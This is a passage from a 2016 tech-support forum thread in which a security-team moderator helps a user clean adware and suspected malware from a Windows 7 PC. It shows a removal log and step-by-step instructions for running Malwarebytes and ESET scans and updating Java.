HKCR\CLSID\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} => key not found.
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully.
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully.
HKLM\Software\Mozilla\Firefox\Extensions\\{ABDE892B-13A8-4d1b-88E6-365A6E755758} => value removed successfully.
HKLM\Software\Mozilla\Firefox\Extensions\\[email protected] => value removed successfully.
HKLM\Software\Mozilla\Firefox\Extensions\\[email protected] => value removed successfully.
HKLM\Software\Mozilla\Firefox\Extensions\\[email protected] => value removed successfully.
"HKLM\Software\MozillaPlugins\@mcafee.com/McAfeeMssPlugin" => key removed successfully.
"HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin" => key removed successfully.
"HKLM\Software\MozillaPlugins\@real.com/nppl3260;version=16.0.2.32" => key removed successfully.
"HKLM\Software\MozillaPlugins\@real.com/nprpplugin;version=16.0.2.32" => key removed successfully.
"HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin" => key removed successfully.
C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll => not found.
Chrome StartupUrls => removed successfully.
Chrome DefaultSearchURL => removed successfully.
Chrome DefaultSearchKeyword => removed successfully.
"HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Google\Chrome\Extensions\bhnddlaigdpagceekbpkajlgbnjbabig" => key removed successfully.
Partizan => service removed successfully.
am2liese => service not found.
"C:\Windows\system32\Drivers\am2liese.sys" => not found.
C:\ProgramData\hash.dat => moved successfully
C:\ProgramData\msdsrnwj.exe => moved successfully
"c:\users\violeta\desktop\unhackme 7.80 build 480 + crack [4realtorrentz].zip" => not found.
"c:\users\violeta\desktop\sve sa desktopa\marijne stvari\rust\rust 14.03 cracked [derpteam].zip" => not found.
"c:\users\violeta\documents\spore\crack\rld-spor.exe" => not found.
"c:\users\violeta\music\violeta za budjenje\keygen.exe" => not found.
C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup => moved successfully
C:\Users\violeta\AppData\LocalLow\uTorrent => moved successfully
C:\Users\violeta\AppData\Roaming\uTorrent => moved successfully
================== Zip: ===================
C:\Users\violeta\spopoi.exe -> copied successfully to C:\Users\violeta\Desktop\Upload.zip
=========== Zip: End ===========
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UnHackMe => moved successfully
C:\Program Files\UnHackMe => moved successfully

========= reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^<username>^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk" /f =========

ERROR: The system was unable to find the specified registry key or value.


========= End of Reg: =========


========= reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\uTorrent" /f =========

The operation completed successfully.



========= End of Reg: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 36644164 B
Java, Flash, Steam htmlcache => 258593897 B
Windows/system/drivers => 7178367 B
Edge => 0 B
Chrome => 16783360 B
Firefox => 708132000 B
Opera => 8201216 B

Temp, IE cache, history, cookies, recent:
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 107959661 B
LocalService => 132244 B
NetworkService => 260 B
violeta => 325692772 B

RecycleBin => 0 B
EmptyTemp: => 1.4 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 08:15:50 ====
nikolap is offline  
Old 10-19-2016, 01:43 AM   #14
Registered Member
 
Join Date: Oct 2016
Posts: 31
OS: windows 7 service pack 1



P.S. i forgot to attach the upload.zip file sorry.
Attached Files
File Type: zip Upload.zip (127.2 KB, 21 views)
nikolap is offline  
Old 10-19-2016, 07:23 PM   #15
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, nikolap. You're very welcome. How is the machine behaving?

------------------------------------------------------

CCleaner
TuneUp Utilities


We do not recommend the use of registry cleaners, or the registry cleaner feature of CCleaner. Our colleague miekiemoes has an excellent writeup here

We suggest uninstalling TuneUp Utilities via Programs and Features in your Control Panel.

------------------------------------------------------
  • Please submit the Upload.zip to this site ==> Submit a Malware Sample and include this link in the message->>http://www.techsupportforum.com/forums/f50/not-working-correctly-windows-firewall-1163025.html#post7257633
  • You can then delete the file from your desktop, once you have uploaded it to the above recipient.
  • Please let me know you submitted the file.
------------------------------------------------------

Please download Malwarebytes Anti-Malware and save it to your desktop.
  • Double-click mbam-setup-2.2.1.1043.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish
  • At the end of the installation, a database update will be performed.
  • Click on Scan Now
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Remove Selected to allow MBAM to clean what was detected.
  • In most cases, a restart will be required and a prompt will be shown.
  • Wait for the prompt to restart the computer to appear, then click on Yes
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double-click on the Scan Log which shows the Date and Time of the scan just performed.
  • Click Export
  • Click Text file (*.txt)
  • In the Save File dialog box which appears, click on Desktop.
  • In the File name: box type a name for your scan log.
  • A message box named File Saved should appear stating "Your file has been successfully exported".
  • Click Ok
  • Post that saved log in your next reply.
------------------------------------------------------

Uninstall the following via the Programs and Features Panel (Start->(Settings)->Control Panel->Programs->Programs and Features):

Java 8 Update 45
Java 8 Update 91


These are all outdated, and security risks by having them installed still. Reboot your computer once all those Java components are removed.

Going forward, Java will overwrite existing installs, so removing older versions should not be required after this.

Go here and follow the prompts to install the latest Java > https://java.com/en/

Make sure you untick the box next to whatever free program they prompt you to install, unless you want it.
  • After the install is complete, go back to your Control Panel and click the Java icon. (looks like a coffee cup)
    • On the General tab, under Temporary Internet Files, click the Settings button.
    • Next, click on the Delete Files button.
    • There are two options checked in the window to clear the cache - Leave BOTH Checked
      • Cached Applications and Applets
      • Trace and Log Files
    • Click OK on Delete Temporary Files Window.
      Note: This deletes ALL the Downloaded Cached Applications and Applets from the CACHE
    • Click OK to leave the Temporary Files Window.
    • Click OK to leave the Java Control Panel.
------------------------------------------------------

Please run this online scan to help look for remnants. Ensure your external and/or USB drives are inserted during the scan.

Go here and click 'SCAN NOW' under 'ESET Online Scanner' to check for remnants.
  • You will be prompted to download and install esetonlinescanner_enu.exe. Click on the link and save the file to a convenient location.
  • Double-click on esetonlinescanner_enu.exe to install and a new window will open. Follow the prompts.
  • Turn off the real-time scanner of any existing antivirus program before performing the online scan. Here's how
  • At the bottom of the Terms of use window, tick the option Download latest version of ESET Online Scanner then click Accept
  • When/if prompted by UAC, 'Do you want to allow this app to make changes to your PC?', please choose Yes
  • Tick the option Enable detection of potentially unwanted applications
  • Click on Advanced settings
  • Make sure that the option Clean threats automatically is unticked.
  • Ensure these options are ticked:
    • Enable detection of potentially unsafe applications
    • Enable detection of suspicious applications
    • Scan archives
    • Enable Anti-Stealth technology
  • Click Scan
  • Wait for the scan to finish.
  • When the scan is done, if it shows a screen that says Threats found, click Save to text file... then name it and save it to your desktop.
  • Do NOT be alarmed by what you see in the report. Many of the finds have likely been quarantined.
  • Please copy/paste the contents of the log in your next reply.
  • To close ESET Online Scanner, select Do not clean then Finish
------------------------------------------------------

Please post the following in your next reply:

MBAM log
ESET report
report on system behavior
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 10-20-2016, 01:37 AM   #16
Registered Member
 
Join Date: Oct 2016
Posts: 31
OS: windows 7 service pack 1



chemist i am sorry to report that MBAM is not able to install as it gives me an error:
Setup was unable to create the directory "C:/ProgramData/Malwarebytes/Malwarebytes-Anti-Malware" error 5 access is denied.
The error apears even when i give it administrator rights(even when i change the install directory).i did as you said for java and it became updated.next ESET program seems to change its screen to be completely grey if it goes beyond 100000 files.
The current status says the firewall is now no longer reseting back to on,but when it is on it now doesnt seem to ask for permission for any of my currently installed programs,but that is expected.I am unable to see if the firewall is broken or changed in some way.
nikolap is offline  
Old 10-20-2016, 02:43 AM   #17
Registered Member
 
Join Date: Oct 2016
Posts: 31
OS: windows 7 service pack 1



P.S. i did submit the file
nikolap is offline  
Old 10-20-2016, 03:42 PM   #18
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, nikolap. Thanks for submitting the file.

Was MBAM previously installed on your machine?

Download mbam-clean-2.3.0.1001.exe and Save it to your Desktop.
  • Double-click mbam-clean-2.3.0.1001.exe and follow the prompts to run it.
  • When prompted, please reboot your computer.
  • Delete mbam-clean-2.3.0.1001.exe from your desktop.
-------------------------------------------------------

Now try installing MBAM. Let me know.

-------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 10-20-2016, 11:51 PM   #19
Registered Member
 
Join Date: Oct 2016
Posts: 31
OS: windows 7 service pack 1



this error apears:
Imgur: The most awesome images on the Internet
And yes MBAM was a few years ago installed,but im pretty sure i uninstalled it.
nikolap is offline  
Old 10-21-2016, 12:55 PM   #20
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Sorry you are having trouble. Please run FRST again and post/attach the logs as before. Thanks.
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Closed Thread

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Similar Threads
Thread Thread Starter Forum Replies Last Post
Help!
Im unable to complete the gmer scan. It wont allow me to copy the results of the scan to submit to you guys. What do I do now?
REDLEG Resolved HJT Threads 49 12-15-2013 02:15 PM
Repost Per: CatByte Trojan:dos/alureon.e and SmartHDD problem
Trojan:dos/alureon.e and SmartHDD problem Hello, I hope I'm at the right area for help. This pc I'm on was infected with Trojan:dos/alureon.e and SmartHDD. I was able to get to the net somehow and I installed and ran Malwarebytes and got rid of SmartHDD. Then I ran Windows Defender and it found...
mg67 Resolved HJT Threads 23 07-30-2012 06:24 AM
virus removal help
:smile::smile: thanks in advance for any help you can provide. i have been a member on the forum for a number of yrs, and you have helped me in the past. i started to see my pc slow down so i did all the standard (cleaning, delete all tmp files, etc) it did not help. then i notice that i was...
stroh Resolved HJT Threads 50 03-04-2012 07:06 AM
Virus blocking internet access.
After removing XP Antispyware 2012,I can no longer connect to the internet.It just says "acquiring network address". When I do ipconfig it says "RPC server is unavailable".There's nothing wrong with the internet connection itself.Just something on my computer preventing it from connecting. ....
honeybe Resolved HJT Threads 28 01-10-2012 02:26 AM

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is on
Smilies are on
[IMG] code is on
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off


Post a Question


» Site Navigation
 > FAQ
  > 10.0.0.2
Powered by vBadvanced CMPS v3.2.3


All times are GMT -7. The time now is 08:37 PM.


Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2020, vBulletin Solutions, Inc.
vBulletin Security provided by vBSecurity v2.2.2 (Pro) - vBulletin Mods & Addons Copyright © 2020 DragonByte Technologies Ltd.
User Alert System provided by Advanced User Tagging v3.1.0 (Pro) - vBulletin Mods & Addons Copyright © 2020 DragonByte Technologies Ltd.
Copyright 2001 - 2018, Tech Support Forum

Windows 10 - Windows 7 - Windows XP - Windows Vista - Trojan Removal - Spyware Removal - Virus Removal - Networking - Security - Top Web Hosts